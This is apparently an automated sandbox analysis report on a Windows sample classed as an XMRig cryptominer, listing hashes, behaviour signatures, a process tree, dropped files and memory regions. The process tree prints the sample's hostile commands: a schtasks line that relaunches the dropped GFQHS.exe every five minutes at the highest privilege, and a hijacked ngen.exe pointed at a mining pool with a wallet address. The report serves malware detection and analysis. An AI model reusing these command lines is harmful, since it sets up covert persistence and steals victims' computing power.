Analysis

  • max time kernel
    119s
  • max time network
    138s
  • platform
    windows7_x64
  • resource
    win7-20230712-en
  • resource tags

    arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
  • submitted
    28/08/2023, 08:49

General

  • Target

    a9c1a64a330f7efb69db6bc253553412.exe

  • Size

    1.1MB

  • MD5

    a9c1a64a330f7efb69db6bc253553412

  • SHA1

    39b827dd01d06b9fecc3c309d94440ba1001b3bf

  • SHA256

    96c6e2e05cc2fe89a0a88aa68ea749c06a35621ca4a74732aaccb25ed890657d

  • SHA512

    8fbad460d795c6719360c2ae8f84349b65371fb361e15ff840d178e7462570c36dc224e869fe63289c5e6da3532832b4bae552a7eeea3613f973e8f1b418b30e

  • SSDEEP

    12288:ekmcopRKZ7xBgQ5J3GD+h49T151rJ+r9OzcTWB53V1LKGh9KhH3Jqv:ekqfKZ7jgoZm+y9v1lE0nfL5g

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 19 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 47 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a9c1a64a330f7efb69db6bc253553412.exe
    "C:\Users\Admin\AppData\Local\Temp\a9c1a64a330f7efb69db6bc253553412.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3020
    • C:\Windows\system32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp7B38.tmp.bat""
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2944
      • C:\Windows\system32\timeout.exe
        timeout 3
        3⤵
        • Delays execution with timeout.exe
        PID:3012
      • C:\ProgramData\tagh\GFQHS.exe
        "C:\ProgramData\tagh\GFQHS.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:312
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "GFQHS" /tr "C:\ProgramData\tagh\GFQHS.exe"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2888
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "GFQHS" /tr "C:\ProgramData\tagh\GFQHS.exe"
            5⤵
            • Creates scheduled task(s)
            PID:2776
        • C:\Users\Admin\AppData\Roaming\white.exe
          "C:\Users\Admin\AppData\Roaming\white.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:3060
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1800
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3060 -s 108
            5⤵
            • Loads dropped DLL
            • Program crash
            PID:1032
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe --url pool.hashvault.pro:5555 --user 41r4ZZVFW5tbPRM1CMyeJZBtThZxyfPygGxwuUFy3fV7M7VXnykC6gqDiYWkj1fXzJhQS5h7VbWXt6N5ZEp6bB3z8hCfBG5 --pass X --donate-level 1 --max-cpu-usage=50
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:1428

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\tagh\GFQHS.exe

          Filesize

          1.1MB

          MD5

          a9c1a64a330f7efb69db6bc253553412

          SHA1

          39b827dd01d06b9fecc3c309d94440ba1001b3bf

          SHA256

          96c6e2e05cc2fe89a0a88aa68ea749c06a35621ca4a74732aaccb25ed890657d

          SHA512

          8fbad460d795c6719360c2ae8f84349b65371fb361e15ff840d178e7462570c36dc224e869fe63289c5e6da3532832b4bae552a7eeea3613f973e8f1b418b30e

        • C:\ProgramData\tagh\GFQHS.exe

          Filesize

          1.1MB

          MD5

          a9c1a64a330f7efb69db6bc253553412

          SHA1

          39b827dd01d06b9fecc3c309d94440ba1001b3bf

          SHA256

          96c6e2e05cc2fe89a0a88aa68ea749c06a35621ca4a74732aaccb25ed890657d

          SHA512

          8fbad460d795c6719360c2ae8f84349b65371fb361e15ff840d178e7462570c36dc224e869fe63289c5e6da3532832b4bae552a7eeea3613f973e8f1b418b30e

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

          Filesize

          61KB

          MD5

          f3441b8572aae8801c04f3060b550443

          SHA1

          4ef0a35436125d6821831ef36c28ffaf196cda15

          SHA256

          6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

          SHA512

          5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          304B

          MD5

          d69b2a13c20c627b3c7544895aa47aaf

          SHA1

          b969d6a1ff3726d38f3c813b70290446dd2d8e9c

          SHA256

          4f5141f2c542031c127c63d03b7ef33297a53ab3773ac94d1fd09dd18dd68ac4

          SHA512

          64a88337f6415c2a779b32c8c9907f8bccad113d21b2883c507c8fe33f7245f28494c71ca48fa000ff3372aa0aa9a1385e316103b805dd6dcab9711ec572128a

        • C:\Users\Admin\AppData\Local\Temp\Cab987A.tmp

          Filesize

          62KB

          MD5

          3ac860860707baaf32469fa7cc7c0192

          SHA1

          c33c2acdaba0e6fa41fd2f00f186804722477639

          SHA256

          d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

          SHA512

          d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

        • C:\Users\Admin\AppData\Local\Temp\Tar99AA.tmp

          Filesize

          163KB

          MD5

          9441737383d21192400eca82fda910ec

          SHA1

          725e0d606a4fc9ba44aa8ffde65bed15e65367e4

          SHA256

          bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

          SHA512

          7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

        • C:\Users\Admin\AppData\Local\Temp\tmp7B38.tmp.bat

          Filesize

          138B

          MD5

          907ff1621674b0bca29a8fa712bb360b

          SHA1

          3e60c34d6ff3b22a4611b54b6ea2fde194aca462

          SHA256

          22e5e0f41e7e9be27c3b8b236f1b9d0de46cea7f7c289b553ef99a4974250f61

          SHA512

          b4243ef3e7514c37301a1f0705339a33db12712a2d039d26280c9b50c3bf62bf3b571d0af72372d738c6c133de6b8977c16c0e0b336e15b3a1d2e3248128a65a

        • C:\Users\Admin\AppData\Local\Temp\tmp7B38.tmp.bat

          Filesize

          138B

          MD5

          907ff1621674b0bca29a8fa712bb360b

          SHA1

          3e60c34d6ff3b22a4611b54b6ea2fde194aca462

          SHA256

          22e5e0f41e7e9be27c3b8b236f1b9d0de46cea7f7c289b553ef99a4974250f61

          SHA512

          b4243ef3e7514c37301a1f0705339a33db12712a2d039d26280c9b50c3bf62bf3b571d0af72372d738c6c133de6b8977c16c0e0b336e15b3a1d2e3248128a65a

        • C:\Users\Admin\AppData\Roaming\white.exe

          Filesize

          10.0MB

          MD5

          e8bae28d2144081bb8e3aa27dfa7c5ec

          SHA1

          7a6e37a366c01f7db0449796244f8a6eb8ff85d5

          SHA256

          f5712d683a589ef10b9cbb88a42d42d811f885a41b823aa25baa0ebf7626b1dd

          SHA512

          241452f32cb1b6ad149cfd2f8a2ad0bbeac43b8c56f4a6a46563801748534d0266cd64705c63877ef59b2e69f9e0a831e0e14a8e82fba08b84a050195a5b732e

        • \ProgramData\tagh\GFQHS.exe

          Filesize

          1.1MB

          MD5

          a9c1a64a330f7efb69db6bc253553412

          SHA1

          39b827dd01d06b9fecc3c309d94440ba1001b3bf

          SHA256

          96c6e2e05cc2fe89a0a88aa68ea749c06a35621ca4a74732aaccb25ed890657d

          SHA512

          8fbad460d795c6719360c2ae8f84349b65371fb361e15ff840d178e7462570c36dc224e869fe63289c5e6da3532832b4bae552a7eeea3613f973e8f1b418b30e

        • \Users\Admin\AppData\Roaming\white.exe

          Filesize

          10.0MB

          MD5

          e8bae28d2144081bb8e3aa27dfa7c5ec

          SHA1

          7a6e37a366c01f7db0449796244f8a6eb8ff85d5

          SHA256

          f5712d683a589ef10b9cbb88a42d42d811f885a41b823aa25baa0ebf7626b1dd

          SHA512

          241452f32cb1b6ad149cfd2f8a2ad0bbeac43b8c56f4a6a46563801748534d0266cd64705c63877ef59b2e69f9e0a831e0e14a8e82fba08b84a050195a5b732e

        • \Users\Admin\AppData\Roaming\white.exe

          Filesize

          10.0MB

          MD5

          e8bae28d2144081bb8e3aa27dfa7c5ec

          SHA1

          7a6e37a366c01f7db0449796244f8a6eb8ff85d5

          SHA256

          f5712d683a589ef10b9cbb88a42d42d811f885a41b823aa25baa0ebf7626b1dd

          SHA512

          241452f32cb1b6ad149cfd2f8a2ad0bbeac43b8c56f4a6a46563801748534d0266cd64705c63877ef59b2e69f9e0a831e0e14a8e82fba08b84a050195a5b732e

        • \Users\Admin\AppData\Roaming\white.exe

          Filesize

          10.0MB

          MD5

          e8bae28d2144081bb8e3aa27dfa7c5ec

          SHA1

          7a6e37a366c01f7db0449796244f8a6eb8ff85d5

          SHA256

          f5712d683a589ef10b9cbb88a42d42d811f885a41b823aa25baa0ebf7626b1dd

          SHA512

          241452f32cb1b6ad149cfd2f8a2ad0bbeac43b8c56f4a6a46563801748534d0266cd64705c63877ef59b2e69f9e0a831e0e14a8e82fba08b84a050195a5b732e

        • memory/312-18-0x000007FEF5320000-0x000007FEF5D0C000-memory.dmp

          Filesize

          9.9MB

        • memory/312-19-0x0000000001330000-0x0000000001442000-memory.dmp

          Filesize

          1.1MB

        • memory/312-20-0x0000000000640000-0x00000000006C0000-memory.dmp

          Filesize

          512KB

        • memory/312-133-0x000007FEF5320000-0x000007FEF5D0C000-memory.dmp

          Filesize

          9.9MB

        • memory/312-87-0x000007FEF5320000-0x000007FEF5D0C000-memory.dmp

          Filesize

          9.9MB

        • memory/312-88-0x0000000000640000-0x00000000006C0000-memory.dmp

          Filesize

          512KB

        • memory/1428-129-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/1428-136-0x00000000002E0000-0x0000000000300000-memory.dmp

          Filesize

          128KB

        • memory/1428-147-0x0000000000390000-0x00000000003B0000-memory.dmp

          Filesize

          128KB

        • memory/1428-146-0x0000000000390000-0x00000000003B0000-memory.dmp

          Filesize

          128KB

        • memory/1428-145-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/1428-144-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/1428-143-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/1428-142-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/1428-141-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/1428-140-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/1428-139-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/1428-138-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/1428-137-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/1428-135-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/1428-132-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/1428-118-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/1428-119-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/1428-120-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/1428-121-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/1428-122-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/1428-130-0x000007FFFFFD6000-0x000007FFFFFD7000-memory.dmp

          Filesize

          4KB

        • memory/1428-123-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/1428-125-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/1428-126-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/1428-127-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/1428-128-0x0000000140000000-0x00000001407C9000-memory.dmp

          Filesize

          7.8MB

        • memory/1800-110-0x0000000074530000-0x0000000074C1E000-memory.dmp

          Filesize

          6.9MB

        • memory/1800-106-0x0000000000400000-0x0000000000428000-memory.dmp

          Filesize

          160KB

        • memory/1800-114-0x0000000000A20000-0x0000000000A60000-memory.dmp

          Filesize

          256KB

        • memory/1800-99-0x0000000000400000-0x0000000000428000-memory.dmp

          Filesize

          160KB

        • memory/1800-113-0x0000000074530000-0x0000000074C1E000-memory.dmp

          Filesize

          6.9MB

        • memory/1800-103-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

          Filesize

          4KB

        • memory/1800-98-0x0000000000400000-0x0000000000428000-memory.dmp

          Filesize

          160KB

        • memory/1800-111-0x0000000000A20000-0x0000000000A60000-memory.dmp

          Filesize

          256KB

        • memory/1800-124-0x0000000074530000-0x0000000074C1E000-memory.dmp

          Filesize

          6.9MB

        • memory/1800-105-0x0000000000400000-0x0000000000428000-memory.dmp

          Filesize

          160KB

        • memory/3020-2-0x000000001BBB0000-0x000000001BC30000-memory.dmp

          Filesize

          512KB

        • memory/3020-0-0x00000000008B0000-0x00000000009C2000-memory.dmp

          Filesize

          1.1MB

        • memory/3020-13-0x000007FEF5D10000-0x000007FEF66FC000-memory.dmp

          Filesize

          9.9MB

        • memory/3020-1-0x000007FEF5D10000-0x000007FEF66FC000-memory.dmp

          Filesize

          9.9MB

        • memory/3060-94-0x0000000000F90000-0x00000000010E5000-memory.dmp

          Filesize

          1.3MB

        • memory/3060-112-0x0000000000F90000-0x00000000010E5000-memory.dmp

          Filesize

          1.3MB

        • memory/3060-97-0x0000000000F90000-0x00000000010E5000-memory.dmp

          Filesize

          1.3MB